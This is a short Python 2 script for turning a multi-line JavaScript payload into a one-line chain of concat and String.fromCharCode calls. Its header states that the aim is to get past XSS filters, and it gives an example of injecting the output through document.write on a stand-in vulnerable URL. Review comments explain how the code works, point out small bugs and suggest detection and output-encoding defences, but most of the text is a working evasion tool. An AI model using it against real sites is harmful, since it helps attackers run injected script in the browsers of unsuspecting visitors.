JavaScript multi-line payload into one line
# The main purpose is to bypass XSS filters and execute a multi-line payload.
# Write your payload to a file (file.txt).
# Run the script and pass the file as the argument:
#   $ python js2S.py file.txt
# Copy the output and pass it to a JavaScript function such as document.write or eval,
# for example: http://vuln2-xss.com/?name=document.write(__output__)
# If any character from the following is filtered, remove it.
import sys,os

# Re-encodes a piece of JavaScript text as one expression made of chained
# ''.concat(...) calls. Characters listed in `alph` are copied into quoted
# literals; every other character is written as String.fromCharCode(<ord>).
# The emitted text therefore contains only letters, digits and ' . ( ) --
# newlines, spaces, angle brackets, double quotes etc. appear only as decimal
# numbers.
#
# NOTE(review): because the original characters never appear literally, a
# filter that matches on individual characters will not see them. Detection
# is better keyed on the chained `.concat(String.fromCharCode(` shape, and the
# durable control is contextual output encoding plus never routing request
# data into eval / document.write.

# argv[1] is treated as a file path when such a file exists, otherwise as the
# text to encode.
path=sys.argv[1]
lines=''
# NOTE(review): this string has a doubled 'i' and its uppercase run ends in
# 'Wxyz', so 'X', 'Y' and 'Z' are not members and take the fromCharCode path.
alph='abcdefghiijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWxyz0123456789'
if os.path.isfile(path):
    # NOTE(review): the file handle is never closed explicitly.
    lines=open(path,'r').read()
else:
    lines=path
# `last` remembers whether the previous character was in `alph`, i.e. whether
# a quoted literal is currently open in `ndata`.
last=False
# 10-character seed. The first loop iteration always appends text starting
# with "))", so the first 12 characters of `ndata` are "''.concat())"; the
# final slice below drops exactly that prefix.
ndata="''.concat("
# `lines` is a str, so this iterates one character at a time.
for l in lines:
    if len(l)<1:
        continue
    legal=l in alph
    asc=ord(l)
    if legal and last:
        # Still inside a quoted literal: append the character as-is.
        ndata=ndata+l
    elif legal and not last:
        # Close the previous fromCharCode( and concat( calls, open a new
        # quoted literal.
        ndata=ndata+")).concat('"+l
    elif last and not legal:
        # Close the open literal and its concat(, then start a fromCharCode
        # call carrying the character's code.
        ndata=ndata+"').concat(String.fromCharCode("+str(asc)
    else:
        # Previous character was also outside `alph`: each such character gets
        # its own concat(String.fromCharCode(N)) call.
        ndata=ndata+')).concat(String.fromCharCode('+str(asc)
    last=legal
# Drop the 12-character seed prefix, re-add the leading '' and append "))".
# NOTE(review): `print` is used as a statement, so this is Python 2 syntax and
# does not parse under Python 3.
print "''"+ndata[12:]+'))'